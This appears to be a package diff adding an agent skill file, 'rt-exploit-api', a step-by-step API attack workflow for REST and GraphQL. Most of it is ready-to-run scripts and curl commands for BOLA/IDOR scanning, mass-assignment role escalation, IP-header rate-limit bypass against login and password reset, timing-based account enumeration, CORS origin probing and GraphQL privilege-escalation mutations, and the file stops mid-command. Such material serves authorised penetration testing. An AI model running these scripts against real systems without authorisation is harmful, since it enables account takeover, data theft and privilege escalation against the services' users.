rtexit-method 0.1.0 → 0.1.2

package/packaged-assets/.agents/skills/rt-exploit-api/SKILL.md

@@ -0,0 +1,1547 @@
+---
+name: rt-exploit-api
+description: "API security testing skill covering REST APIs and GraphQL. REST: BOLA/IDOR, mass assignment, rate limit bypass, HTTP method confusion, CORS misconfiguration. GraphQL: introspection abuse, batching attacks, field suggestions for schema recovery without introspection, query depth DoS. Tools: graphw00f, clairvoyance, Burp Suite."
+---
+
+# rt-exploit-api — API Security Testing Skill
+
+## 1. Overview
+
+Modern applications expose vast attack surfaces through REST and GraphQL APIs. Unlike traditional web vulnerabilities, API flaws often bypass WAFs and application-level controls because they abuse legitimate business logic rather than injecting malicious payloads.
+
+This skill covers two primary API paradigms:
+
+**REST APIs** — stateless HTTP endpoints that operate on resources. Attack surface includes broken object-level authorization (BOLA/IDOR), mass assignment, rate limit bypass, HTTP method confusion, and CORS misconfiguration.
+
+**GraphQL APIs** — query language over a single endpoint. Attack surface includes introspection abuse, batching attacks (rate limit bypass), field suggestion exploitation for schema recovery, query depth/complexity DoS, and alias flooding.
+
+### Threat Model
+
+| Attack Class | REST | GraphQL | OWASP API Top 10 |
+|---|---|---|---|
+| BOLA/IDOR | Yes | Yes | API1:2023 |
+| Mass Assignment | Yes | Partial | API6:2023 |
+| Rate Limit Bypass | Yes | Yes (batching) | API4:2023 |
+| Schema Exposure | N/A | Yes | API8:2023 |
+| Resource Exhaustion | Yes | Yes (depth DoS) | API4:2023 |
+| CORS Misconfiguration | Yes | Yes | API7:2023 |
+
+### Prerequisites
+
+```bash
+# Install core tools
+pip install graphw00f clairvoyance requests
+npm install -g @escape.tech/graphql-armor-cli
+apt-get install -y ffuf feroxbuster nuclei
+
+# Clone useful wordlists
+git clone https://github.com/danielmiessler/SecLists /opt/SecLists
+git clone https://github.com/assetnote/kiterunner /opt/kiterunner
+
+# Python dependencies for custom scripts
+pip install gql requests httpx aiohttp tqdm colorama
+```
+
+---
+
+## 2. Skill Levels
+
+### BEGINNER
+
+Goals: Enumerate endpoints, test basic BOLA with sequential IDs, check introspection, identify obvious misconfigurations.
+
+**Tools:** curl, Burp Suite Community, ffuf
+
+**Expected duration:** 1–2 hours per target
+
+**Key techniques:**
+- Manual endpoint enumeration
+- Sequential ID BOLA testing
+- Basic introspection query
+- Default credential testing
+
+### INTERMEDIATE
+
+Goals: Automated BOLA across all endpoints, mass assignment probing, CORS testing, GraphQL schema recovery.
+
+**Tools:** ffuf, nuclei, kiterunner, graphw00f, clairvoyance, custom Python scripts
+
+**Expected duration:** 2–4 hours per target
+
+**Key techniques:**
+- Kiterunner API route brute-force
+- Mass assignment via parameter pollution
+- Clairvoyance field suggestion harvesting
+- Rate limit fingerprinting
+
+### ADVANCED
+
+Goals: Business logic BOLA (non-sequential IDs), batching attacks for rate limit bypass, WAF bypass, chained vulnerabilities.
+
+**Tools:** All intermediate tools + Burp Suite Pro, turbo intruder, custom GraphQL clients
+
+**Expected duration:** 4–8 hours per target
+
+**Key techniques:**
+- UUID/GUID BOLA via reference leakage
+- GraphQL alias batching for rate limit bypass
+- HTTP method override for access control bypass
+- JWT algorithm confusion to escalate privileges
+
+### EXPERT
+
+Goals: Zero-day logic flaws, novel GraphQL attack patterns, supply chain API abuse, automated exploitation pipelines.
+
+**Tools:** Full custom toolchain, proprietary wordlists, AST-level GraphQL analysis
+
+**Expected duration:** Days per target
+
+**Key techniques:**
+- Custom SDL reconstruction from field suggestions
+- Batching + BOLA chaining for account takeover
+- Subscription abuse for persistent data exfiltration
+- Federation/gateway bypass attacks
+
+---
+
+## 3. Step-by-Step Attack Workflow
+
+### Phase 1: Reconnaissance and Discovery
+
+#### Step 1.1 — Identify API type and version
+
+```bash
+# Fingerprint the API framework
+curl -si https://target.com/api/v1/ | grep -i "x-powered-by\|server\|x-api-version"
+
+# Common API discovery paths
+for path in /api /api/v1 /api/v2 /v1 /v2 /graphql /gql /query /playground; do
+  curl -so /dev/null -w "%{http_code} $path\n" https://target.com$path
+done
+
+# Check OpenAPI/Swagger documentation exposure
+curl -si https://target.com/swagger.json
+curl -si https://target.com/openapi.json
+curl -si https://target.com/api/swagger
+curl -si https://target.com/api-docs
+curl -si https://target.com/docs/api
+curl -si https://target.com/.well-known/openapi
+
+# Check for API versioning patterns
+curl -si https://target.com/api/v3/users
+curl -si https://target.com/api/v3/users -H "API-Version: 2"
+curl -si https://target.com/api/v3/users -H "Accept: application/vnd.api+json;version=2"
+```
+
+#### Step 1.2 — Route discovery with Kiterunner
+
+```bash
+# Download compiled kiterunner
+wget https://github.com/assetnote/kiterunner/releases/download/v1.0.2/kr-1.0.2-linux-amd64.tar.gz
+tar xf kr-1.0.2-linux-amd64.tar.gz
+
+# Scan with built-in wordlists (fastest)
+./kr scan https://target.com/api -w routes-large.kite -x 20 --fail-status-codes 404,429 -o kr-results.txt
+
+# Scan with SecLists
+./kr brute https://target.com/api -w /opt/SecLists/Discovery/Web-Content/api/api-endpoints.txt \
+  -x 20 --fail-status-codes 404 -H "Authorization: Bearer YOUR_JWT"
+
+# Replay interesting findings with full headers
+./kr kb replay -w routes-large.kite "GET 200 [ 1234ms] https://target.com/api/v2/admin/users 0"
+```
+
+#### Step 1.3 — ffuf endpoint discovery
+
+```bash
+# Horizontal discovery — find new resource types
+ffuf -u https://target.com/api/v1/FUZZ \
+  -w /opt/SecLists/Discovery/Web-Content/api/api-endpoints.txt \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -mc 200,201,204,400,403 \
+  -o ffuf-endpoints.json -of json \
+  -t 50 -rate 100
+
+# Vertical discovery — find sub-resources
+ffuf -u https://target.com/api/v1/users/1/FUZZ \
+  -w /opt/SecLists/Discovery/Web-Content/api/api-endpoints.txt \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -mc 200,201,204,400,403 \
+  -t 20
+
+# ID fuzzing — numeric BOLA discovery
+ffuf -u https://target.com/api/v1/users/FUZZ \
+  -w <(seq 1 1000 | tr '\n' '\n') \
+  -H "Authorization: Bearer VICTIM_JWT" \
+  -mc 200 -t 10
+```
+
+#### Step 1.4 — GraphQL detection with graphw00f
+
+```bash
+# Install graphw00f
+pip install graphw00f
+
+# Detect GraphQL engine and version
+graphw00f -d -t https://target.com/graphql
+graphw00f -d -t https://target.com/api/graphql
+graphw00f -d -t https://target.com/gql
+
+# Fingerprint — critical for tailoring DoS payloads and bypass techniques
+# graphw00f identifies: Apollo, Hasura, GraphQL-Go, Strawberry, Ariadne, etc.
+# Output example:
+# [*] Checking https://target.com/graphql
+# [!] Found GraphQL at https://target.com/graphql
+# [*] Fingerprinting...
+# [+] GraphQL Engine: Apollo Server (2.x)
+# [*] Malicious query complexity supported: True
+# [*] Introspection: Enabled
+```
+
+---
+
+### Phase 2: REST API — BOLA / IDOR
+
+#### Step 2.1 — Sequential ID BOLA (BEGINNER)
+
+```bash
+# Capture your own resource ID as user A
+# Login as user A, note your user ID (e.g., 42)
+# Login as user B, attempt to access user A's resources
+
+USER_A_TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
+USER_B_TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
+USER_A_ID=42
+
+# Test direct object reference
+curl -s https://target.com/api/v1/users/$USER_A_ID \
+  -H "Authorization: Bearer $USER_B_TOKEN" | jq .
+
+# Test nested resources
+curl -s https://target.com/api/v1/users/$USER_A_ID/profile \
+  -H "Authorization: Bearer $USER_B_TOKEN" | jq .
+curl -s https://target.com/api/v1/users/$USER_A_ID/orders \
+  -H "Authorization: Bearer $USER_B_TOKEN" | jq .
+curl -s https://target.com/api/v1/users/$USER_A_ID/invoices \
+  -H "Authorization: Bearer $USER_B_TOKEN" | jq .
+curl -s https://target.com/api/v1/users/$USER_A_ID/payment-methods \
+  -H "Authorization: Bearer $USER_B_TOKEN" | jq .
+```
+
+#### Step 2.2 — Automated BOLA scan across multiple IDs (INTERMEDIATE)
+
+```python
+#!/usr/bin/env python3
+# bola_scanner.py — automated BOLA across integer ID ranges
+
+import requests
+import json
+from concurrent.futures import ThreadPoolExecutor
+from tqdm import tqdm
+
+TARGET_BASE = "https://target.com/api/v1"
+ATTACKER_TOKEN = "Bearer YOUR_JWT_HERE"
+ENDPOINTS = [
+    "/users/{id}",
+    "/users/{id}/profile",
+    "/users/{id}/orders",
+    "/users/{id}/invoices",
+    "/orders/{id}",
+    "/invoices/{id}",
+    "/documents/{id}",
+    "/payments/{id}",
+    "/reports/{id}",
+]
+ID_RANGE = range(1, 2000)
+HEADERS = {"Authorization": ATTACKER_TOKEN, "Content-Type": "application/json"}
+
+def test_id(args):
+    endpoint_template, obj_id = args
+    url = TARGET_BASE + endpoint_template.format(id=obj_id)
+    try:
+        r = requests.get(url, headers=HEADERS, timeout=10, allow_redirects=False)
+        if r.status_code == 200:
+            return {"url": url, "id": obj_id, "status": r.status_code, "body_len": len(r.text), "snippet": r.text[:200]}
+    except Exception:
+        pass
+    return None
+
+findings = []
+tasks = [(ep, i) for ep in ENDPOINTS for i in ID_RANGE]
+
+with ThreadPoolExecutor(max_workers=20) as pool:
+    for result in tqdm(pool.map(test_id, tasks), total=len(tasks)):
+        if result:
+            findings.append(result)
+            print(f"[BOLA] {result['url']} -> {result['status']} ({result['body_len']} bytes)")
+
+with open("bola_findings.json", "w") as f:
+    json.dump(findings, f, indent=2)
+
+print(f"\n[+] {len(findings)} BOLA candidates found. Results saved to bola_findings.json")
+```
+
+```bash
+python3 bola_scanner.py
+```
+
+#### Step 2.3 — UUID/GUID BOLA via reference leakage (ADVANCED)
+
+UUIDs are not security controls. Harvest them from API responses, then test cross-user access.
+
+```python
+#!/usr/bin/env python3
+# uuid_harvester.py — extract UUIDs from API responses and test BOLA
+
+import re
+import requests
+import json
+
+UUID_PATTERN = re.compile(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', re.I)
+
+USER_A_TOKEN = "Bearer USER_A_JWT"
+USER_B_TOKEN = "Bearer USER_B_JWT"
+BASE = "https://target.com/api/v1"
+
+# Step 1: Harvest UUIDs from User A's accessible endpoints as User A
+harvested_uuids = set()
+harvest_endpoints = ["/users/me", "/orders", "/invoices", "/documents", "/team/members"]
+
+for ep in harvest_endpoints:
+    r = requests.get(BASE + ep, headers={"Authorization": USER_A_TOKEN})
+    if r.status_code == 200:
+        found = UUID_PATTERN.findall(r.text)
+        harvested_uuids.update(found)
+        print(f"[+] {ep}: {len(found)} UUIDs found")
+
+print(f"\n[*] Total unique UUIDs harvested: {len(harvested_uuids)}")
+
+# Step 2: Test each UUID as User B across all resource endpoints
+resource_endpoints = [
+    "/users/{id}", "/orders/{id}", "/invoices/{id}", "/documents/{id}",
+    "/reports/{id}", "/exports/{id}", "/backups/{id}", "/audit-logs/{id}",
+]
+
+bola_findings = []
+for uuid in harvested_uuids:
+    for ep_template in resource_endpoints:
+        url = BASE + ep_template.format(id=uuid)
+        r = requests.get(url, headers={"Authorization": USER_B_TOKEN}, timeout=10)
+        if r.status_code == 200 and len(r.text) > 50:
+            bola_findings.append({"uuid": uuid, "url": url, "response": r.text[:500]})
+            print(f"[BOLA] {url}")
+
+with open("uuid_bola.json", "w") as f:
+    json.dump(bola_findings, f, indent=2)
+```
+
+#### Step 2.4 — BOLA via indirect references and hashed IDs (EXPERT)
+
+```python
+#!/usr/bin/env python3
+# indirect_bola.py — test BOLA where IDs are encoded/hashed
+
+import hashlib
+import base64
+import requests
+
+BASE = "https://target.com/api/v1"
+ATTACKER_TOKEN = "Bearer YOUR_JWT"
+
+# Many apps use predictable "obfuscation"
+def generate_id_variants(numeric_id):
+    variants = []
+    # Base64 encoded
+    variants.append(base64.b64encode(str(numeric_id).encode()).decode())
+    variants.append(base64.urlsafe_b64encode(str(numeric_id).encode()).decode().rstrip('='))
+    # MD5 hash
+    variants.append(hashlib.md5(str(numeric_id).encode()).hexdigest())
+    # SHA1
+    variants.append(hashlib.sha1(str(numeric_id).encode()).hexdigest())
+    # Hex encoded
+    variants.append(hex(numeric_id)[2:])
+    # Padded
+    variants.append(str(numeric_id).zfill(8))
+    # Double base64
+    variants.append(base64.b64encode(base64.b64encode(str(numeric_id).encode())).decode())
+    return variants
+
+for numeric_id in range(1, 500):
+    for variant in generate_id_variants(numeric_id):
+        r = requests.get(f"{BASE}/users/{variant}",
+                         headers={"Authorization": ATTACKER_TOKEN}, timeout=5)
+        if r.status_code == 200 and 'email' in r.text.lower():
+            print(f"[BOLA] ID {numeric_id} via variant '{variant}': {r.text[:150]}")
+```
+
+---
+
+### Phase 3: REST API — Mass Assignment
+
+#### Step 3.1 — Identify writable fields (BEGINNER)
+
+```bash
+# Compare GET response fields vs PUT/PATCH accepted fields
+# Step 1: Get the resource schema from GET
+curl -s https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" | jq keys
+
+# Step 2: Send PUT with additional fields from the schema
+curl -s -X PUT https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -H "Content-Type: application/json" \
+  -d '{"name": "Test", "email": "test@test.com", "role": "admin", "isVerified": true, "credits": 99999, "plan": "enterprise"}'
+
+# Step 3: Verify if privileged fields were accepted
+curl -s https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" | jq '{role, isVerified, credits, plan}'
+```
+
+#### Step 3.2 — Automated mass assignment probe (INTERMEDIATE)
+
+```python
+#!/usr/bin/env python3
+# mass_assignment.py — brute-force hidden writable fields
+
+import requests
+import json
+
+BASE = "https://target.com/api/v1"
+TOKEN = "Bearer YOUR_JWT"
+HEADERS = {"Authorization": TOKEN, "Content-Type": "application/json"}
+
+# Common privileged field names to probe
+PRIVILEGED_FIELDS = [
+    "role", "roles", "is_admin", "isAdmin", "admin", "superuser",
+    "is_verified", "isVerified", "verified", "email_verified",
+    "credits", "balance", "wallet", "points",
+    "plan", "subscription", "tier", "level",
+    "is_active", "isActive", "status", "account_status",
+    "permissions", "scopes", "groups",
+    "internal", "staff", "employee",
+    "discount", "discount_percentage",
+    "free_trial", "trial_end_date",
+    "api_limit", "rate_limit", "quota",
+    "_id", "id", "user_id", "owner_id",
+]
+
+# Endpoints to test
+TEST_ENDPOINTS = [
+    ("PUT", "/users/me"),
+    ("PATCH", "/users/me"),
+    ("PUT", "/profile"),
+    ("PATCH", "/profile"),
+    ("POST", "/users/me/update"),
+]
+
+# First, get baseline state
+baseline = requests.get(BASE + "/users/me", headers=HEADERS).json()
+print(f"[*] Baseline state: {json.dumps(baseline, indent=2)}")
+
+confirmed_writable = []
+for method, endpoint in TEST_ENDPOINTS:
+    for field in PRIVILEGED_FIELDS:
+        # Try with a clear signal value
+        payload = {field: "MASS_ASSIGN_TEST_" + field}
+        r = requests.request(method, BASE + endpoint,
+                             headers=HEADERS, json=payload, timeout=10)
+        if r.status_code in (200, 201, 204):
+            # Verify if the field changed
+            check = requests.get(BASE + "/users/me", headers=HEADERS).json()
+            # Flatten for comparison
+            check_str = json.dumps(check)
+            if "MASS_ASSIGN_TEST" in check_str or field not in json.dumps(baseline):
+                confirmed_writable.append({
+                    "method": method, "endpoint": endpoint,
+                    "field": field, "response": r.text[:300]
+                })
+                print(f"[MASS ASSIGNMENT] {method} {endpoint} -> field '{field}' accepted!")
+
+print(f"\n[+] Confirmed writable fields: {[f['field'] for f in confirmed_writable]}")
+with open("mass_assignment.json", "w") as f:
+    json.dump(confirmed_writable, f, indent=2)
+```
+
+#### Step 3.3 — Mass assignment via nested objects and arrays (ADVANCED)
+
+```bash
+# Nested role escalation
+curl -s -X PATCH https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -H "Content-Type: application/json" \
+  -d '{"profile": {"role": "admin"}, "metadata": {"permissions": ["admin", "write", "read"]}}'
+
+# Array-based role assignment
+curl -s -X PATCH https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -H "Content-Type: application/json" \
+  -d '{"roles": ["admin", "superuser"], "groups": [1, 2, 3]}'
+
+# Via registration endpoint (often less restricted)
+curl -s -X POST https://target.com/api/v1/register \
+  -H "Content-Type: application/json" \
+  -d '{"username": "test123", "password": "P@ssw0rd!", "email": "test@attacker.com",
+       "role": "admin", "isVerified": true, "plan": "enterprise", "credits": 99999}'
+
+# Via user update with HTTP PUT (full replacement — may accept more fields)
+curl -s -X PUT https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -H "Content-Type: application/json" \
+  -d '{"name": "Attacker", "email": "me@test.com", "role": "admin",
+       "isAdmin": true, "permissions": ["*"], "account_type": "enterprise"}'
+
+# Parameter pollution — duplicate keys (framework-dependent)
+curl -s -X POST https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  -d 'name=test&role=user&role=admin'
+```
+
+---
+
+### Phase 4: REST API — Rate Limit Bypass
+
+#### Step 4.1 — Fingerprint rate limiting (BEGINNER)
+
+```bash
+# Send rapid requests and observe 429 responses
+for i in $(seq 1 100); do
+  curl -so /dev/null -w "%{http_code}\n" \
+    https://target.com/api/v1/users/me \
+    -H "Authorization: Bearer YOUR_JWT"
+done | sort | uniq -c
+
+# Check rate limit headers
+curl -si https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" | grep -i "x-ratelimit\|retry-after\|x-rate"
+```
+
+#### Step 4.2 — IP-based rate limit bypass (INTERMEDIATE)
+
+```bash
+# X-Forwarded-For rotation
+for ip in 1.2.3.{1..100}; do
+  curl -s -X POST https://target.com/api/v1/auth/reset-password \
+    -H "Content-Type: application/json" \
+    -H "X-Forwarded-For: $ip" \
+    -d '{"email": "victim@target.com"}' &
+done
+wait
+
+# Additional headers that may override IP
+# X-Real-IP, X-Originating-IP, X-Remote-IP, X-Client-IP, CF-Connecting-IP
+BYPASS_HEADERS=("X-Forwarded-For" "X-Real-IP" "X-Originating-IP" "X-Remote-IP" "X-Client-IP" "True-Client-IP" "CF-Connecting-IP")
+for header in "${BYPASS_HEADERS[@]}"; do
+  echo -n "[$header] "
+  curl -s -o /dev/null -w "%{http_code}" \
+    -X POST https://target.com/api/v1/auth/login \
+    -H "Content-Type: application/json" \
+    -H "$header: 10.0.0.1" \
+    -d '{"email": "victim@target.com", "password": "wrong"}'
+  echo
+done
+```
+
+#### Step 4.3 — Account enumeration via timing (ADVANCED)
+
+```python
+#!/usr/bin/env python3
+# timing_enum.py — user enumeration via response timing differences
+
+import requests
+import time
+import statistics
+
+BASE = "https://target.com/api/v1"
+EMAILS = ["admin@target.com", "noreply@target.com", "test@target.com",
+          "nonexistent_xyz123@target.com", "info@target.com"]
+
+def measure_timing(email, samples=5):
+    times = []
+    for _ in range(samples):
+        start = time.perf_counter()
+        requests.post(BASE + "/auth/login",
+                      json={"email": email, "password": "WrongPassword123!"},
+                      timeout=15)
+        elapsed = time.perf_counter() - start
+        times.append(elapsed)
+    return statistics.mean(times), statistics.stdev(times)
+
+print("Timing-based user enumeration:")
+print(f"{'Email':<40} {'Mean (ms)':>10} {'StdDev':>10}")
+print("-" * 65)
+for email in EMAILS:
+    mean, stdev = measure_timing(email)
+    flag = " <-- EXISTS?" if mean > 0.5 else ""
+    print(f"{email:<40} {mean*1000:>10.1f} {stdev*1000:>10.1f}{flag}")
+```
+
+---
+
+### Phase 5: REST API — HTTP Method Confusion
+
+#### Step 5.1 — Method override attacks (INTERMEDIATE)
+
+```bash
+# Try every HTTP method on each endpoint
+for method in GET POST PUT PATCH DELETE HEAD OPTIONS TRACE CONNECT; do
+  echo -n "[$method] "
+  curl -s -o /dev/null -w "%{http_code}" \
+    -X $method https://target.com/api/v1/admin/users \
+    -H "Authorization: Bearer LOW_PRIV_JWT"
+  echo
+done
+
+# HTTP method override headers (bypass method-based ACLs)
+for override in "X-HTTP-Method-Override: DELETE" "X-Method-Override: DELETE" \
+  "X-HTTP-Method: DELETE" "_method=DELETE"; do
+  echo "Testing: $override"
+  curl -s -o /dev/null -w "%{http_code}" \
+    -X POST https://target.com/api/v1/admin/users/1 \
+    -H "Authorization: Bearer LOW_PRIV_JWT" \
+    -H "$override"
+  echo
+done
+
+# Query parameter method override
+curl -s -X POST "https://target.com/api/v1/admin/users/1?_method=DELETE" \
+  -H "Authorization: Bearer LOW_PRIV_JWT"
+
+# Verb tunneling — PUT inside POST body
+curl -s -X POST https://target.com/api/v1/users/me \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -H "X-HTTP-Method-Override: PUT" \
+  -H "Content-Type: application/json" \
+  -d '{"role": "admin"}'
+```
+
+---
+
+### Phase 6: REST API — CORS Misconfiguration
+
+#### Step 6.1 — CORS testing (BEGINNER/INTERMEDIATE)
+
+```bash
+# Test wildcard CORS
+curl -si https://target.com/api/v1/users/me \
+  -H "Origin: https://evil.com" \
+  -H "Authorization: Bearer YOUR_JWT" | grep -i "access-control"
+
+# Test null origin
+curl -si https://target.com/api/v1/users/me \
+  -H "Origin: null" \
+  -H "Authorization: Bearer YOUR_JWT" | grep -i "access-control"
+
+# Test subdomain bypass
+curl -si https://target.com/api/v1/users/me \
+  -H "Origin: https://evil.target.com" \
+  -H "Authorization: Bearer YOUR_JWT" | grep -i "access-control"
+
+# Test origin reflection
+curl -si https://target.com/api/v1/users/me \
+  -H "Origin: https://attacker.com" \
+  -H "Authorization: Bearer YOUR_JWT" | grep -i "access-control-allow-origin"
+
+# Automated CORS testing with nuclei
+nuclei -u https://target.com -t ~/nuclei-templates/vulnerabilities/cors/ \
+  -H "Authorization: Bearer YOUR_JWT"
+```
+
+```python
+# cors_tester.py — systematic CORS origin testing
+import requests
+
+BASE = "https://target.com/api/v1"
+TOKEN = "Bearer YOUR_JWT"
+ENDPOINTS = ["/users/me", "/orders", "/invoices", "/admin/users"]
+
+test_origins = [
+    "https://evil.com",
+    "null",
+    "https://evil.target.com",
+    "https://target.com.evil.com",
+    "https://target-com.evil.com",
+    "http://target.com",              # HTTP downgrade
+    "https://target.com%60.evil.com", # URL encoding
+    "https://notarget.com",
+    "https://target.com\\.evil.com",  # Backslash bypass
+]
+
+for endpoint in ENDPOINTS:
+    for origin in test_origins:
+        r = requests.get(BASE + endpoint,
+                         headers={"Authorization": TOKEN, "Origin": origin})
+        acao = r.headers.get("Access-Control-Allow-Origin", "")
+        acac = r.headers.get("Access-Control-Allow-Credentials", "false")
+        if origin in acao or acao == "*":
+            vuln_flag = " [VULNERABLE]" if acac.lower() == "true" else " [MISCONFIGURED]"
+            print(f"{endpoint} | Origin: {origin} -> ACAO: {acao}{vuln_flag}")
+```
+
+---
+
+### Phase 7: GraphQL — Introspection Abuse
+
+#### Step 7.1 — Basic introspection query (BEGINNER)
+
+```bash
+# Check if introspection is enabled
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{ __schema { queryType { name } } }"}' | jq .
+
+# Full introspection dump
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{
+    "query": "query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"
+  }' > introspection_dump.json
+
+# Parse types from dump
+cat introspection_dump.json | jq '.data.__schema.types[].name' | grep -v '^"__'
+
+# Parse all queries
+cat introspection_dump.json | jq '.data.__schema.types[] | select(.name == "Query") | .fields[].name'
+
+# Parse all mutations
+cat introspection_dump.json | jq '.data.__schema.types[] | select(.name == "Mutation") | .fields[].name'
+```
+
+#### Step 7.2 — Introspection with graphw00f
+
+```bash
+# Full detection and introspection pipeline
+graphw00f -d -t https://target.com/graphql -o graphw00f_output.json
+
+# Use graphw00f to detect disabled introspection (confirms GraphQL presence even without introspection)
+# graphw00f uses error message fingerprinting, not just introspection queries
+graphw00f -f -t https://target.com/graphql
+
+# Generate introspection report
+graphw00f -d -t https://target.com/graphql --format json -o engine_info.json
+cat engine_info.json | jq .
+```
+
+#### Step 7.3 — Exploiting introspection findings (ADVANCED)
+
+```python
+#!/usr/bin/env python3
+# graphql_exploit.py — enumerate and test mutations from introspection
+
+import requests
+import json
+
+GRAPHQL_URL = "https://target.com/graphql"
+TOKEN = "Bearer YOUR_JWT"
+HEADERS = {"Authorization": TOKEN, "Content-Type": "application/json"}
+
+def gql(query, variables=None):
+    payload = {"query": query}
+    if variables:
+        payload["variables"] = variables
+    r = requests.post(GRAPHQL_URL, headers=HEADERS, json=payload)
+    return r.json()
+
+# Get all mutations
+result = gql("""
+{ __schema {
+    types {
+      name
+      kind
+      fields { name description args { name type { name kind ofType { name kind } } } }
+    }
+  }
+}
+""")
+
+mutations = [t for t in result["data"]["__schema"]["types"] if t["name"] == "Mutation"]
+if mutations:
+    print("[*] Available Mutations:")
+    for field in mutations[0].get("fields", []):
+        print(f"  - {field['name']}")
+        for arg in field.get("args", []):
+            print(f"      arg: {arg['name']} ({arg.get('type', {}).get('name', 'complex')})")
+
+# Test privilege escalation mutations
+priv_esc_mutations = [
+    'updateUserRole(userId: "1", role: "ADMIN") { id role }',
+    'grantAdminAccess(userId: "1") { success }',
+    'updatePermissions(userId: "1", permissions: ["ADMIN"]) { id }',
+    'makeUserAdmin(id: "1") { id isAdmin }',
+]
+
+print("\n[*] Testing privilege escalation mutations:")
+for mutation in priv_esc_mutations:
+    result = gql(f"mutation {{ {mutation} }}")
+    if "errors" not in result:
+        print(f"[VULN] mutation {{ {mutation} }}")
+        print(f"       Response: {json.dumps(result)[:200]}")
+    else:
+        print(f"[-] {mutation[:60]}... -> {result['errors'][0]['message'][:80]}")
+```
+
+---
+
+### Phase 8: GraphQL — Schema Recovery Without Introspection (clairvoyance)
+
+#### Step 8.1 — Run clairvoyance (INTERMEDIATE)
+
+```bash
+# Install clairvoyance
+pip install clairvoyance
+
+# Basic field suggestion harvesting
+clairvoyance -u https://target.com/graphql \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -o schema.json \
+  -w /opt/SecLists/Discovery/Web-Content/graphql.txt
+
+# With custom headers (API key, session cookie)
+clairvoyance -u https://target.com/graphql \
+  -H "Authorization: Bearer JWT" \
+  -H "X-API-Key: YOUR_KEY" \
+  -o schema.json
+
+# Use broader wordlist for better coverage
+clairvoyance -u https://target.com/graphql \
+  -H "Authorization: Bearer YOUR_JWT" \
+  -w /opt/SecLists/Discovery/Variables/secret-keywords.txt \
+  -o schema_extended.json
+
+# Convert recovered schema to SDL (Schema Definition Language)
+python3 -c "
+import json
+data = json.load(open('schema.json'))
+print(json.dumps(data, indent=2))
+"
+```
+
+#### Step 8.2 — Manual field suggestion harvesting (ADVANCED)
+
+GraphQL returns suggestions like: `Did you mean 'userSecret'?` when you query a near-match field.
+
+```python
+#!/usr/bin/env python3
+# field_suggester.py — extract schema via GraphQL error messages
+
+import requests
+import re
+import string
+import json
+from itertools import product
+
+GRAPHQL_URL = "https://target.com/graphql"
+TOKEN = "Bearer YOUR_JWT"
+HEADERS = {"Authorization": TOKEN, "Content-Type": "application/json"}
+
+SUGGESTION_PATTERN = re.compile(r"Did you mean[:\s]+['\"]?(\w+)['\"]?", re.IGNORECASE)
+
+discovered_fields = set()
+
+def query_field(field_name, type_name="Query"):
+    payload = {"query": f"{{ {field_name} }}"}
+    try:
+        r = requests.post(GRAPHQL_URL, headers=HEADERS, json=payload, timeout=10)
+        data = r.json()
+        errors = data.get("errors", [])
+        for error in errors:
+            msg = error.get("message", "")
+            matches = SUGGESTION_PATTERN.findall(msg)
+            for match in matches:
+                if match not in discovered_fields:
+                    discovered_fields.add(match)
+                    print(f"[+] Discovered field: {match}")
+        return errors
+    except Exception as e:
+        return []
+
+# Probe with common prefixes + single chars to trigger suggestions
+common_prefixes = ["user", "admin", "account", "get", "create", "update", "delete",
+                   "list", "fetch", "query", "find", "search", "auth", "login",
+                   "register", "profile", "order", "payment", "invoice", "report",
+                   "secret", "token", "key", "config", "setting", "flag"]
+
+for prefix in common_prefixes:
+    for suffix in string.ascii_lowercase:
+        query_field(prefix + suffix)
+
+# Now probe discovered fields for their sub-fields
+for field in list(discovered_fields):
+    payload = {"query": f"{{ {field} {{ nonExistentField_ }} }}"}
+    r = requests.post(GRAPHQL_URL, headers=HEADERS, json=payload, timeout=10)
+    data = r.json()
+    for error in data.get("errors", []):
+        matches = SUGGESTION_PATTERN.findall(error.get("message", ""))
+        for match in matches:
+            discovered_fields.add(f"{field}.{match}")
+            print(f"[+] Sub-field: {field}.{match}")
+
+print(f"\n[*] Total discovered: {len(discovered_fields)} fields/sub-fields")
+with open("discovered_schema.txt", "w") as f:
+    f.write("\n".join(sorted(discovered_fields)))
+```
+
+#### Step 8.3 — Alternative introspection bypass techniques (EXPERT)
+
+```bash
+# Some servers disable __schema but allow __type
+curl -s -X POST https://target.com/graphql \
+  -H "Content-Type: application/json" \
+  -d '{"query": "{ __type(name: \"User\") { fields { name type { name } } } }"}' | jq .
+
+# Try with GET method (some APIs have introspection only on GET)
+curl -s "https://target.com/graphql?query=%7B__schema%7BqueryType%7Bname%7D%7D%7D" \
+  -H "Authorization: Bearer YOUR_JWT" | jq .
+
+# Bypass via field alias (some WAF rules key on __schema literally)
+curl -s -X POST https://target.com/graphql \
